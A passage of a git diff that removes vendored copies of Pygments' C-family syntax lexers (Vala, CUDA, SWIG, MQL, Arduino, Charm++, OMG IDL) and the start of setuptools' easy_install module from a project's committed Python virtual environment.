- (r'//(\n|(.|\n)*?[^\\]\n)', Comment.Single), - (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline), - ], - 'statements': [ - (r'[L@]?"', String, 'string'), - (r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", - String.Char), - (r'(?s)""".*?"""', String), # verbatim strings - (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[lL]?', Number.Float), - (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), - (r'0x[0-9a-fA-F]+[Ll]?', Number.Hex), - (r'0[0-7]+[Ll]?', Number.Oct), - (r'\d+[Ll]?', Number.Integer), - (r'[~!%^&*+=|?:<>/-]', Operator), - (r'(\[)(Compact|Immutable|(?:Boolean|Simple)Type)(\])', - bygroups(Punctuation, Name.Decorator, Punctuation)), - # TODO: "correctly" parse complex code attributes - (r'(\[)(CCode|(?:Integer|Floating)Type)', - bygroups(Punctuation, Name.Decorator)), - (r'[()\[\],.]', Punctuation), - (words(( - 'as', 'base', 'break', 'case', 'catch', 'construct', 'continue', - 'default', 'delete', 'do', 'else', 'enum', 'finally', 'for', - 'foreach', 'get', 'if', 'in', 'is', 'lock', 'new', 'out', 'params', - 'return', 'set', 'sizeof', 'switch', 'this', 'throw', 'try', - 'typeof', 'while', 'yield'), suffix=r'\b'), - Keyword), - (words(( - 'abstract', 'const', 'delegate', 'dynamic', 'ensures', 'extern', - 'inline', 'internal', 'override', 'owned', 'private', 'protected', - 'public', 'ref', 'requires', 'signal', 'static', 'throws', 'unowned', - 'var', 'virtual', 'volatile', 'weak', 'yields'), suffix=r'\b'), - Keyword.Declaration), - (r'(namespace|using)(\s+)', bygroups(Keyword.Namespace, Whitespace), - 'namespace'), - (r'(class|errordomain|interface|struct)(\s+)', - bygroups(Keyword.Declaration, Whitespace), 'class'), - (r'(\.)([a-zA-Z_]\w*)', - bygroups(Operator, Name.Attribute)), - # void is an actual keyword, others are in glib-2.0.vapi - (words(( - 'void', 'bool', 'char', 'double', 'float', 'int', 'int8', 'int16', - 'int32', 'int64', 'long', 'short', 'size_t', 'ssize_t', 'string', - 'time_t', 'uchar', 'uint', 'uint8', 'uint16', 'uint32', 'uint64', - 'ulong', 'unichar', 'ushort'), suffix=r'\b'), - Keyword.Type), - (r'(true|false|null)\b', Name.Builtin), - (r'[a-zA-Z_]\w*', Name), - ], - 'root': [ - include('whitespace'), - default('statement'), - ], - 'statement': [ - include('whitespace'), - include('statements'), - ('[{}]', Punctuation), - (';', Punctuation, '#pop'), - ], - 'string': [ - (r'"', String, '#pop'), - (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), - (r'[^\\"\n]+', String), # all other characters - (r'\\\n', String), # line continuation - (r'\\', String), # stray backslash - ], - 'if0': [ - (r'^\s*#if.*?(?`_ - source. - - .. versionadded:: 1.6 - """ - name = 'CUDA' - filenames = ['*.cu', '*.cuh'] - aliases = ['cuda', 'cu'] - mimetypes = ['text/x-cuda'] - - function_qualifiers = {'__device__', '__global__', '__host__', - '__noinline__', '__forceinline__'} - variable_qualifiers = {'__device__', '__constant__', '__shared__', - '__restrict__'} - vector_types = {'char1', 'uchar1', 'char2', 'uchar2', 'char3', 'uchar3', - 'char4', 'uchar4', 'short1', 'ushort1', 'short2', 'ushort2', - 'short3', 'ushort3', 'short4', 'ushort4', 'int1', 'uint1', - 'int2', 'uint2', 'int3', 'uint3', 'int4', 'uint4', 'long1', - 'ulong1', 'long2', 'ulong2', 'long3', 'ulong3', 'long4', - 'ulong4', 'longlong1', 'ulonglong1', 'longlong2', - 'ulonglong2', 'float1', 'float2', 'float3', 'float4', - 'double1', 'double2', 'dim3'} - variables = {'gridDim', 'blockIdx', 'blockDim', 'threadIdx', 'warpSize'} - functions = {'__threadfence_block', '__threadfence', '__threadfence_system', - '__syncthreads', '__syncthreads_count', '__syncthreads_and', - '__syncthreads_or'} - execution_confs = {'<<<', '>>>'} - - def get_tokens_unprocessed(self, text, stack=('root',)): - for index, token, value in CLexer.get_tokens_unprocessed(self, text, stack): - if token is Name: - if value in self.variable_qualifiers: - token = Keyword.Type - elif value in self.vector_types: - token = Keyword.Type - elif value in self.variables: - token = Name.Builtin - elif value in self.execution_confs: - token = Keyword.Pseudo - elif value in self.function_qualifiers: - token = Keyword.Reserved - elif value in self.functions: - token = Name.Function - yield index, token, value - - -class SwigLexer(CppLexer): - """ - For `SWIG `_ source code. - - .. versionadded:: 2.0 - """ - name = 'SWIG' - aliases = ['swig'] - filenames = ['*.swg', '*.i'] - mimetypes = ['text/swig'] - priority = 0.04 # Lower than C/C++ and Objective C/C++ - - tokens = { - 'root': [ - # Match it here so it won't be matched as a function in the rest of root - (r'\$\**\&?\w+', Name), - inherit - ], - 'statements': [ - # SWIG directives - (r'(%[a-z_][a-z0-9_]*)', Name.Function), - # Special variables - (r'\$\**\&?\w+', Name), - # Stringification / additional preprocessor directives - (r'##*[a-zA-Z_]\w*', Comment.Preproc), - inherit, - ], - } - - # This is a far from complete set of SWIG directives - swig_directives = { - # Most common directives - '%apply', '%define', '%director', '%enddef', '%exception', '%extend', - '%feature', '%fragment', '%ignore', '%immutable', '%import', '%include', - '%inline', '%insert', '%module', '%newobject', '%nspace', '%pragma', - '%rename', '%shared_ptr', '%template', '%typecheck', '%typemap', - # Less common directives - '%arg', '%attribute', '%bang', '%begin', '%callback', '%catches', '%clear', - '%constant', '%copyctor', '%csconst', '%csconstvalue', '%csenum', - '%csmethodmodifiers', '%csnothrowexception', '%default', '%defaultctor', - '%defaultdtor', '%defined', '%delete', '%delobject', '%descriptor', - '%exceptionclass', '%exceptionvar', '%extend_smart_pointer', '%fragments', - '%header', '%ifcplusplus', '%ignorewarn', '%implicit', '%implicitconv', - '%init', '%javaconst', '%javaconstvalue', '%javaenum', '%javaexception', - '%javamethodmodifiers', '%kwargs', '%luacode', '%mutable', '%naturalvar', - '%nestedworkaround', '%perlcode', '%pythonabc', '%pythonappend', - '%pythoncallback', '%pythoncode', '%pythondynamic', '%pythonmaybecall', - '%pythonnondynamic', '%pythonprepend', '%refobject', '%shadow', '%sizeof', - '%trackobjects', '%types', '%unrefobject', '%varargs', '%warn', - '%warnfilter'} - - def analyse_text(text): - rv = 0 - # Search for SWIG directives, which are conventionally at the beginning of - # a line. The probability of them being within a line is low, so let another - # lexer win in this case. - matches = re.findall(r'^\s*(%[a-z_][a-z0-9_]*)', text, re.M) - for m in matches: - if m in SwigLexer.swig_directives: - rv = 0.98 - break - else: - rv = 0.91 # Fraction higher than MatlabLexer - return rv - - -class MqlLexer(CppLexer): - """ - For `MQL4 `_ and - `MQL5 `_ source code. - - .. versionadded:: 2.0 - """ - name = 'MQL' - aliases = ['mql', 'mq4', 'mq5', 'mql4', 'mql5'] - filenames = ['*.mq4', '*.mq5', '*.mqh'] - mimetypes = ['text/x-mql'] - - tokens = { - 'statements': [ - (words(_mql_builtins.keywords, suffix=r'\b'), Keyword), - (words(_mql_builtins.c_types, suffix=r'\b'), Keyword.Type), - (words(_mql_builtins.types, suffix=r'\b'), Name.Function), - (words(_mql_builtins.constants, suffix=r'\b'), Name.Constant), - (words(_mql_builtins.colors, prefix='(clr)?', suffix=r'\b'), - Name.Constant), - inherit, - ], - } - - -class ArduinoLexer(CppLexer): - """ - For `Arduino(tm) `_ source. - - This is an extension of the CppLexer, as the Arduino® Language is a superset - of C++ - - .. versionadded:: 2.1 - """ - - name = 'Arduino' - aliases = ['arduino'] - filenames = ['*.ino'] - mimetypes = ['text/x-arduino'] - - # Language sketch main structure functions - structure = {'setup', 'loop'} - - # Language operators - operators = {'not', 'or', 'and', 'xor'} - - # Language 'variables' - variables = { - 'DIGITAL_MESSAGE', 'FIRMATA_STRING', 'ANALOG_MESSAGE', 'REPORT_DIGITAL', - 'REPORT_ANALOG', 'INPUT_PULLUP', 'SET_PIN_MODE', 'INTERNAL2V56', 'SYSTEM_RESET', - 'LED_BUILTIN', 'INTERNAL1V1', 'SYSEX_START', 'INTERNAL', 'EXTERNAL', 'HIGH', - 'LOW', 'INPUT', 'OUTPUT', 'INPUT_PULLUP', 'LED_BUILTIN', 'true', 'false', - 'void', 'boolean', 'char', 'unsigned char', 'byte', 'int', 'unsigned int', - 'word', 'long', 'unsigned long', 'short', 'float', 'double', 'string', 'String', - 'array', 'static', 'volatile', 'const', 'boolean', 'byte', 'word', 'string', - 'String', 'array', 'int', 'float', 'private', 'char', 'virtual', 'operator', - 'sizeof', 'uint8_t', 'uint16_t', 'uint32_t', 'uint64_t', 'int8_t', 'int16_t', - 'int32_t', 'int64_t', 'dynamic_cast', 'typedef', 'const_cast', 'const', - 'struct', 'static_cast', 'union', 'unsigned', 'long', 'volatile', 'static', - 'protected', 'bool', 'public', 'friend', 'auto', 'void', 'enum', 'extern', - 'class', 'short', 'reinterpret_cast', 'double', 'register', 'explicit', - 'signed', 'inline', 'delete', '_Bool', 'complex', '_Complex', '_Imaginary', - 'atomic_bool', 'atomic_char', 'atomic_schar', 'atomic_uchar', 'atomic_short', - 'atomic_ushort', 'atomic_int', 'atomic_uint', 'atomic_long', 'atomic_ulong', - 'atomic_llong', 'atomic_ullong', 'PROGMEM'} - - # Language shipped functions and class ( ) - functions = { - 'KeyboardController', 'MouseController', 'SoftwareSerial', 'EthernetServer', - 'EthernetClient', 'LiquidCrystal', 'RobotControl', 'GSMVoiceCall', - 'EthernetUDP', 'EsploraTFT', 'HttpClient', 'RobotMotor', 'WiFiClient', - 'GSMScanner', 'FileSystem', 'Scheduler', 'GSMServer', 'YunClient', 'YunServer', - 'IPAddress', 'GSMClient', 'GSMModem', 'Keyboard', 'Ethernet', 'Console', - 'GSMBand', 'Esplora', 'Stepper', 'Process', 'WiFiUDP', 'GSM_SMS', 'Mailbox', - 'USBHost', 'Firmata', 'PImage', 'Client', 'Server', 'GSMPIN', 'FileIO', - 'Bridge', 'Serial', 'EEPROM', 'Stream', 'Mouse', 'Audio', 'Servo', 'File', - 'Task', 'GPRS', 'WiFi', 'Wire', 'TFT', 'GSM', 'SPI', 'SD', - 'runShellCommandAsynchronously', 'analogWriteResolution', - 'retrieveCallingNumber', 'printFirmwareVersion', 'analogReadResolution', - 'sendDigitalPortPair', 'noListenOnLocalhost', 'readJoystickButton', - 'setFirmwareVersion', 'readJoystickSwitch', 'scrollDisplayRight', - 'getVoiceCallStatus', 'scrollDisplayLeft', 'writeMicroseconds', - 'delayMicroseconds', 'beginTransmission', 'getSignalStrength', - 'runAsynchronously', 'getAsynchronously', 'listenOnLocalhost', - 'getCurrentCarrier', 'readAccelerometer', 'messageAvailable', - 'sendDigitalPorts', 'lineFollowConfig', 'countryNameWrite', 'runShellCommand', - 'readStringUntil', 'rewindDirectory', 'readTemperature', 'setClockDivider', - 'readLightSensor', 'endTransmission', 'analogReference', 'detachInterrupt', - 'countryNameRead', 'attachInterrupt', 'encryptionType', 'readBytesUntil', - 'robotNameWrite', 'readMicrophone', 'robotNameRead', 'cityNameWrite', - 'userNameWrite', 'readJoystickY', 'readJoystickX', 'mouseReleased', - 'openNextFile', 'scanNetworks', 'noInterrupts', 'digitalWrite', 'beginSpeaker', - 'mousePressed', 'isActionDone', 'mouseDragged', 'displayLogos', 'noAutoscroll', - 'addParameter', 'remoteNumber', 'getModifiers', 'keyboardRead', 'userNameRead', - 'waitContinue', 'processInput', 'parseCommand', 'printVersion', 'readNetworks', - 'writeMessage', 'blinkVersion', 'cityNameRead', 'readMessage', 'setDataMode', - 'parsePacket', 'isListening', 'setBitOrder', 'beginPacket', 'isDirectory', - 'motorsWrite', 'drawCompass', 'digitalRead', 'clearScreen', 'serialEvent', - 'rightToLeft', 'setTextSize', 'leftToRight', 'requestFrom', 'keyReleased', - 'compassRead', 'analogWrite', 'interrupts', 'WiFiServer', 'disconnect', - 'playMelody', 'parseFloat', 'autoscroll', 'getPINUsed', 'setPINUsed', - 'setTimeout', 'sendAnalog', 'readSlider', 'analogRead', 'beginWrite', - 'createChar', 'motorsStop', 'keyPressed', 'tempoWrite', 'readButton', - 'subnetMask', 'debugPrint', 'macAddress', 'writeGreen', 'randomSeed', - 'attachGPRS', 'readString', 'sendString', 'remotePort', 'releaseAll', - 'mouseMoved', 'background', 'getXChange', 'getYChange', 'answerCall', - 'getResult', 'voiceCall', 'endPacket', 'constrain', 'getSocket', 'writeJSON', - 'getButton', 'available', 'connected', 'findUntil', 'readBytes', 'exitValue', - 'readGreen', 'writeBlue', 'startLoop', 'IPAddress', 'isPressed', 'sendSysex', - 'pauseMode', 'gatewayIP', 'setCursor', 'getOemKey', 'tuneWrite', 'noDisplay', - 'loadImage', 'switchPIN', 'onRequest', 'onReceive', 'changePIN', 'playFile', - 'noBuffer', 'parseInt', 'overflow', 'checkPIN', 'knobRead', 'beginTFT', - 'bitClear', 'updateIR', 'bitWrite', 'position', 'writeRGB', 'highByte', - 'writeRed', 'setSpeed', 'readBlue', 'noStroke', 'remoteIP', 'transfer', - 'shutdown', 'hangCall', 'beginSMS', 'endWrite', 'attached', 'maintain', - 'noCursor', 'checkReg', 'checkPUK', 'shiftOut', 'isValid', 'shiftIn', 'pulseIn', - 'connect', 'println', 'localIP', 'pinMode', 'getIMEI', 'display', 'noBlink', - 'process', 'getBand', 'running', 'beginSD', 'drawBMP', 'lowByte', 'setBand', - 'release', 'bitRead', 'prepare', 'pointTo', 'readRed', 'setMode', 'noFill', - 'remove', 'listen', 'stroke', 'detach', 'attach', 'noTone', 'exists', 'buffer', - 'height', 'bitSet', 'circle', 'config', 'cursor', 'random', 'IRread', 'setDNS', - 'endSMS', 'getKey', 'micros', 'millis', 'begin', 'print', 'write', 'ready', - 'flush', 'width', 'isPIN', 'blink', 'clear', 'press', 'mkdir', 'rmdir', 'close', - 'point', 'yield', 'image', 'BSSID', 'click', 'delay', 'read', 'text', 'move', - 'peek', 'beep', 'rect', 'line', 'open', 'seek', 'fill', 'size', 'turn', 'stop', - 'home', 'find', 'step', 'tone', 'sqrt', 'RSSI', 'SSID', 'end', 'bit', 'tan', - 'cos', 'sin', 'pow', 'map', 'abs', 'max', 'min', 'get', 'run', 'put', - 'isAlphaNumeric', 'isAlpha', 'isAscii', 'isWhitespace', 'isControl', 'isDigit', - 'isGraph', 'isLowerCase', 'isPrintable', 'isPunct', 'isSpace', 'isUpperCase', - 'isHexadecimalDigit'} - - # do not highlight - suppress_highlight = { - 'namespace', 'template', 'mutable', 'using', 'asm', 'typeid', - 'typename', 'this', 'alignof', 'constexpr', 'decltype', 'noexcept', - 'static_assert', 'thread_local', 'restrict'} - - def get_tokens_unprocessed(self, text, stack=('root',)): - for index, token, value in CppLexer.get_tokens_unprocessed(self, text, stack): - if value in self.structure: - yield index, Name.Builtin, value - elif value in self.operators: - yield index, Operator, value - elif value in self.variables: - yield index, Keyword.Reserved, value - elif value in self.suppress_highlight: - yield index, Name, value - elif value in self.functions: - yield index, Name.Function, value - else: - yield index, token, value - - -class CharmciLexer(CppLexer): - """ - For `Charm++ `_ interface files (.ci). - - .. versionadded:: 2.4 - """ - - name = 'Charmci' - aliases = ['charmci'] - filenames = ['*.ci'] - - mimetypes = [] - - tokens = { - 'keywords': [ - (r'(module)(\s+)', bygroups(Keyword, Text), 'classname'), - (words(('mainmodule', 'mainchare', 'chare', 'array', 'group', - 'nodegroup', 'message', 'conditional')), Keyword), - (words(('entry', 'aggregate', 'threaded', 'sync', 'exclusive', - 'nokeep', 'notrace', 'immediate', 'expedited', 'inline', - 'local', 'python', 'accel', 'readwrite', 'writeonly', - 'accelblock', 'memcritical', 'packed', 'varsize', - 'initproc', 'initnode', 'initcall', 'stacksize', - 'createhere', 'createhome', 'reductiontarget', 'iget', - 'nocopy', 'mutable', 'migratable', 'readonly')), Keyword), - inherit, - ], - } - - -class OmgIdlLexer(CLexer): - """ - Lexer for Object Management Group Interface Definition Language. - - .. versionadded:: 2.9 - """ - - name = 'OMG Interface Definition Language' - url = 'https://www.omg.org/spec/IDL/About-IDL/' - aliases = ['omg-idl'] - filenames = ['*.idl', '*.pidl'] - mimetypes = [] - - scoped_name = r'((::)?\w+)+' - - tokens = { - 'values': [ - (words(('true', 'false'), prefix=r'(?i)', suffix=r'\b'), Number), - (r'([Ll]?)(")', bygroups(String.Affix, String.Double), 'string'), - (r'([Ll]?)(\')(\\[^\']+)(\')', - bygroups(String.Affix, String.Char, String.Escape, String.Char)), - (r'([Ll]?)(\')(\\\')(\')', - bygroups(String.Affix, String.Char, String.Escape, String.Char)), - (r'([Ll]?)(\'.\')', bygroups(String.Affix, String.Char)), - (r'[+-]?\d+(\.\d*)?[Ee][+-]?\d+', Number.Float), - (r'[+-]?(\d+\.\d*)|(\d*\.\d+)([Ee][+-]?\d+)?', Number.Float), - (r'(?i)[+-]?0x[0-9a-f]+', Number.Hex), - (r'[+-]?[1-9]\d*', Number.Integer), - (r'[+-]?0[0-7]*', Number.Oct), - (r'[\+\-\*\/%^&\|~]', Operator), - (words(('<<', '>>')), Operator), - (scoped_name, Name), - (r'[{};:,<>\[\]]', Punctuation), - ], - 'annotation_params': [ - include('whitespace'), - (r'\(', Punctuation, '#push'), - include('values'), - (r'=', Punctuation), - (r'\)', Punctuation, '#pop'), - ], - 'annotation_params_maybe': [ - (r'\(', Punctuation, 'annotation_params'), - include('whitespace'), - default('#pop'), - ], - 'annotation_appl': [ - (r'@' + scoped_name, Name.Decorator, 'annotation_params_maybe'), - ], - 'enum': [ - include('whitespace'), - (r'[{,]', Punctuation), - (r'\w+', Name.Constant), - include('annotation_appl'), - (r'\}', Punctuation, '#pop'), - ], - 'root': [ - include('whitespace'), - (words(( - 'typedef', 'const', - 'in', 'out', 'inout', 'local', - ), prefix=r'(?i)', suffix=r'\b'), Keyword.Declaration), - (words(( - 'void', 'any', 'native', 'bitfield', - 'unsigned', 'boolean', 'char', 'wchar', 'octet', 'short', 'long', - 'int8', 'uint8', 'int16', 'int32', 'int64', 'uint16', 'uint32', 'uint64', - 'float', 'double', 'fixed', - 'sequence', 'string', 'wstring', 'map', - ), prefix=r'(?i)', suffix=r'\b'), Keyword.Type), - (words(( - '@annotation', 'struct', 'union', 'bitset', 'interface', - 'exception', 'valuetype', 'eventtype', 'component', - ), prefix=r'(?i)', suffix=r'(\s+)(\w+)'), bygroups(Keyword, Whitespace, Name.Class)), - (words(( - 'abstract', 'alias', 'attribute', 'case', 'connector', - 'consumes', 'context', 'custom', 'default', 'emits', 'factory', - 'finder', 'getraises', 'home', 'import', 'manages', 'mirrorport', - 'multiple', 'Object', 'oneway', 'primarykey', 'private', 'port', - 'porttype', 'provides', 'public', 'publishes', 'raises', - 'readonly', 'setraises', 'supports', 'switch', 'truncatable', - 'typeid', 'typename', 'typeprefix', 'uses', 'ValueBase', - ), prefix=r'(?i)', suffix=r'\b'), Keyword), - (r'(?i)(enum|bitmask)(\s+)(\w+)', - bygroups(Keyword, Whitespace, Name.Class), 'enum'), - (r'(?i)(module)(\s+)(\w+)', - bygroups(Keyword.Namespace, Whitespace, Name.Namespace)), - (r'(\w+)(\s*)(=)', bygroups(Name.Constant, Whitespace, Operator)), - (r'[\(\)]', Punctuation), - include('values'), - include('annotation_appl'), - ], - } diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py deleted file mode 100644 index 5e0f97cfea5484ea1ea139e0f4b8e8553b80b00d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/setuptools/command/easy_install.py +++ /dev/null @@ -1,2290 +0,0 @@ -""" -Easy Install ------------- - -A tool for doing automatic download/extract/build of distutils-based Python -packages. For detailed documentation, see the accompanying EasyInstall.txt -file, or visit the `EasyInstall home page`__. - -__ https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html - -""" - -from glob import glob -from distutils.util import get_platform -from distutils.util import convert_path, subst_vars -from distutils.errors import ( - DistutilsArgError, DistutilsOptionError, - DistutilsError, DistutilsPlatformError, -) -from distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS -from distutils import log, dir_util -from distutils.command.build_scripts import first_line_re -from distutils.spawn import find_executable -import sys -import os -import zipimport -import shutil -import tempfile -import zipfile -import re -import stat -import random -import textwrap -import warnings -import site -import struct -import contextlib -import subprocess -import shlex -import io -import configparser - - -from sysconfig import get_config_vars, get_path - -from setuptools import SetuptoolsDeprecationWarning - -from setuptools import Command -from setuptools.sandbox import run_setup -from setuptools.command import setopt -from setuptools.archive_util import unpack_archive -from setuptools.package_index import ( - PackageIndex, parse_requirement_arg, URL_SCHEME, -) -from setuptools.command import bdist_egg, egg_info -from setuptools.wheel import Wheel -from pkg_resources import ( - yield_lines, normalize_path, resource_string, ensure_directory, - get_distribution, find_distributions, Environment, Requirement, - Distribution, PathMetadata, EggMetadata, WorkingSet, DistributionNotFound, - VersionConflict, DEVELOP_DIST, -) -import pkg_resources - -# Turn on PEP440Warnings -warnings.filterwarnings("default", category=pkg_resources.PEP440Warning) - -__all__ = [ - 'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg', - 'get_exe_prefixes', -] - - -def is_64bit(): - return struct.calcsize("P") == 8 - - -def samefile(p1, p2): - """ - Determine if two paths reference the same file. - - Augments os.path.samefile to work on Windows and - suppresses errors if the path doesn't exist. - """ - both_exist = os.path.exists(p1) and os.path.exists(p2) - use_samefile = hasattr(os.path, 'samefile') and both_exist - if use_samefile: - return os.path.samefile(p1, p2) - norm_p1 = os.path.normpath(os.path.normcase(p1)) - norm_p2 = os.path.normpath(os.path.normcase(p2)) - return norm_p1 == norm_p2 - - -def _to_bytes(s): - return s.encode('utf8') - - -def isascii(s): - try: - s.encode('ascii') - return True - except UnicodeError: - return False - - -def _one_liner(text): - return textwrap.dedent(text).strip().replace('\n', '; ') - - -class easy_install(Command): - """Manage a download/build/install process""" - description = "Find/get/install Python packages" - command_consumes_arguments = True - - user_options = [ - ('prefix=', None, "installation prefix"), - ("zip-ok", "z", "install package as a zipfile"), - ("multi-version", "m", "make apps have to require() a version"), - ("upgrade", "U", "force upgrade (searches PyPI for latest versions)"), - ("install-dir=", "d", "install package to DIR"), - ("script-dir=", "s", "install scripts to DIR"), - ("exclude-scripts", "x", "Don't install scripts"), - ("always-copy", "a", "Copy all needed packages to install dir"), - ("index-url=", "i", "base URL of Python Package Index"), - ("find-links=", "f", "additional URL(s) to search for packages"), - ("build-directory=", "b", - "download/extract/build in DIR; keep the results"), - ('optimize=', 'O', - "also compile with optimization: -O1 for \"python -O\", " - "-O2 for \"python -OO\", and -O0 to disable [default: -O0]"), - ('record=', None, - "filename in which to record list of installed files"), - ('always-unzip', 'Z', "don't install as a zipfile, no matter what"), - ('site-dirs=', 'S', "list of directories where .pth files work"), - ('editable', 'e', "Install specified packages in editable form"), - ('no-deps', 'N', "don't install dependencies"), - ('allow-hosts=', 'H', "pattern(s) that hostnames must match"), - ('local-snapshots-ok', 'l', - "allow building eggs from local checkouts"), - ('version', None, "print version information and exit"), - ('no-find-links', None, - "Don't load find-links defined in packages being installed"), - ('user', None, "install in user site-package '%s'" % site.USER_SITE) - ] - boolean_options = [ - 'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy', - 'editable', - 'no-deps', 'local-snapshots-ok', 'version', - 'user' - ] - - negative_opt = {'always-unzip': 'zip-ok'} - create_index = PackageIndex - - def initialize_options(self): - # the --user option seems to be an opt-in one, - # so the default should be False. - self.user = 0 - self.zip_ok = self.local_snapshots_ok = None - self.install_dir = self.script_dir = self.exclude_scripts = None - self.index_url = None - self.find_links = None - self.build_directory = None - self.args = None - self.optimize = self.record = None - self.upgrade = self.always_copy = self.multi_version = None - self.editable = self.no_deps = self.allow_hosts = None - self.root = self.prefix = self.no_report = None - self.version = None - self.install_purelib = None # for pure module distributions - self.install_platlib = None # non-pure (dists w/ extensions) - self.install_headers = None # for C/C++ headers - self.install_lib = None # set to either purelib or platlib - self.install_scripts = None - self.install_data = None - self.install_base = None - self.install_platbase = None - if site.ENABLE_USER_SITE: - self.install_userbase = site.USER_BASE - self.install_usersite = site.USER_SITE - else: - self.install_userbase = None - self.install_usersite = None - self.no_find_links = None - - # Options not specifiable via command line - self.package_index = None - self.pth_file = self.always_copy_from = None - self.site_dirs = None - self.installed_projects = {} - # Always read easy_install options, even if we are subclassed, or have - # an independent instance created. This ensures that defaults will - # always come from the standard configuration file(s)' "easy_install" - # section, even if this is a "develop" or "install" command, or some - # other embedding. - self._dry_run = None - self.verbose = self.distribution.verbose - self.distribution._set_command_options( - self, self.distribution.get_option_dict('easy_install') - ) - - def delete_blockers(self, blockers): - extant_blockers = ( - filename for filename in blockers - if os.path.exists(filename) or os.path.islink(filename) - ) - list(map(self._delete_path, extant_blockers)) - - def _delete_path(self, path): - log.info("Deleting %s", path) - if self.dry_run: - return - - is_tree = os.path.isdir(path) and not os.path.islink(path) - remover = rmtree if is_tree else os.unlink - remover(path) - - @staticmethod - def _render_version(): - """ - Render the Setuptools version and installation details, then exit. - """ - ver = '{}.{}'.format(*sys.version_info) - dist = get_distribution('setuptools') - tmpl = 'setuptools {dist.version} from {dist.location} (Python {ver})' - print(tmpl.format(**locals())) - raise SystemExit() - - def finalize_options(self): # noqa: C901 # is too complex (25) # FIXME - self.version and self._render_version() - - py_version = sys.version.split()[0] - prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix') - - self.config_vars = { - 'dist_name': self.distribution.get_name(), - 'dist_version': self.distribution.get_version(), - 'dist_fullname': self.distribution.get_fullname(), - 'py_version': py_version, - 'py_version_short': py_version[0:3], - 'py_version_nodot': py_version[0] + py_version[2], - 'sys_prefix': prefix, - 'prefix': prefix, - 'sys_exec_prefix': exec_prefix, - 'exec_prefix': exec_prefix, - # Only python 3.2+ has abiflags - 'abiflags': getattr(sys, 'abiflags', ''), - } - - if site.ENABLE_USER_SITE: - self.config_vars['userbase'] = self.install_userbase - self.config_vars['usersite'] = self.install_usersite - - elif self.user: - log.warn("WARNING: The user site-packages directory is disabled.") - - self._fix_install_dir_for_user_site() - - self.expand_basedirs() - self.expand_dirs() - - self._expand( - 'install_dir', 'script_dir', 'build_directory', - 'site_dirs', - ) - # If a non-default installation directory was specified, default the - # script directory to match it. - if self.script_dir is None: - self.script_dir = self.install_dir - - if self.no_find_links is None: - self.no_find_links = False - - # Let install_dir get set by install_lib command, which in turn - # gets its info from the install command, and takes into account - # --prefix and --home and all that other crud. - self.set_undefined_options( - 'install_lib', ('install_dir', 'install_dir') - ) - # Likewise, set default script_dir from 'install_scripts.install_dir' - self.set_undefined_options( - 'install_scripts', ('install_dir', 'script_dir') - ) - - if self.user and self.install_purelib: - self.install_dir = self.install_purelib - self.script_dir = self.install_scripts - # default --record from the install command - self.set_undefined_options('install', ('record', 'record')) - # Should this be moved to the if statement below? It's not used - # elsewhere - normpath = map(normalize_path, sys.path) - self.all_site_dirs = get_site_dirs() - if self.site_dirs is not None: - site_dirs = [ - os.path.expanduser(s.strip()) for s in - self.site_dirs.split(',') - ] - for d in site_dirs: - if not os.path.isdir(d): - log.warn("%s (in --site-dirs) does not exist", d) - elif normalize_path(d) not in normpath: - raise DistutilsOptionError( - d + " (in --site-dirs) is not on sys.path" - ) - else: - self.all_site_dirs.append(normalize_path(d)) - if not self.editable: - self.check_site_dir() - self.index_url = self.index_url or "https://pypi.org/simple/" - self.shadow_path = self.all_site_dirs[:] - for path_item in self.install_dir, normalize_path(self.script_dir): - if path_item not in self.shadow_path: - self.shadow_path.insert(0, path_item) - - if self.allow_hosts is not None: - hosts = [s.strip() for s in self.allow_hosts.split(',')] - else: - hosts = ['*'] - if self.package_index is None: - self.package_index = self.create_index( - self.index_url, search_path=self.shadow_path, hosts=hosts, - ) - self.local_index = Environment(self.shadow_path + sys.path) - - if self.find_links is not None: - if isinstance(self.find_links, str): - self.find_links = self.find_links.split() - else: - self.find_links = [] - if self.local_snapshots_ok: - self.package_index.scan_egg_links(self.shadow_path + sys.path) - if not self.no_find_links: - self.package_index.add_find_links(self.find_links) - self.set_undefined_options('install_lib', ('optimize', 'optimize')) - if not isinstance(self.optimize, int): - try: - self.optimize = int(self.optimize) - if not (0 <= self.optimize <= 2): - raise ValueError - except ValueError as e: - raise DistutilsOptionError( - "--optimize must be 0, 1, or 2" - ) from e - - if self.editable and not self.build_directory: - raise DistutilsArgError( - "Must specify a build directory (-b) when using --editable" - ) - if not self.args: - raise DistutilsArgError( - "No urls, filenames, or requirements specified (see --help)") - - self.outputs = [] - - def _fix_install_dir_for_user_site(self): - """ - Fix the install_dir if "--user" was used. - """ - if not self.user or not site.ENABLE_USER_SITE: - return - - self.create_home_path() - if self.install_userbase is None: - msg = "User base directory is not specified" - raise DistutilsPlatformError(msg) - self.install_base = self.install_platbase = self.install_userbase - scheme_name = os.name.replace('posix', 'unix') + '_user' - self.select_scheme(scheme_name) - - def _expand_attrs(self, attrs): - for attr in attrs: - val = getattr(self, attr) - if val is not None: - if os.name == 'posix' or os.name == 'nt': - val = os.path.expanduser(val) - val = subst_vars(val, self.config_vars) - setattr(self, attr, val) - - def expand_basedirs(self): - """Calls `os.path.expanduser` on install_base, install_platbase and - root.""" - self._expand_attrs(['install_base', 'install_platbase', 'root']) - - def expand_dirs(self): - """Calls `os.path.expanduser` on install dirs.""" - dirs = [ - 'install_purelib', - 'install_platlib', - 'install_lib', - 'install_headers', - 'install_scripts', - 'install_data', - ] - self._expand_attrs(dirs) - - def run(self, show_deprecation=True): - if show_deprecation: - self.announce( - "WARNING: The easy_install command is deprecated " - "and will be removed in a future version.", - log.WARN, - ) - 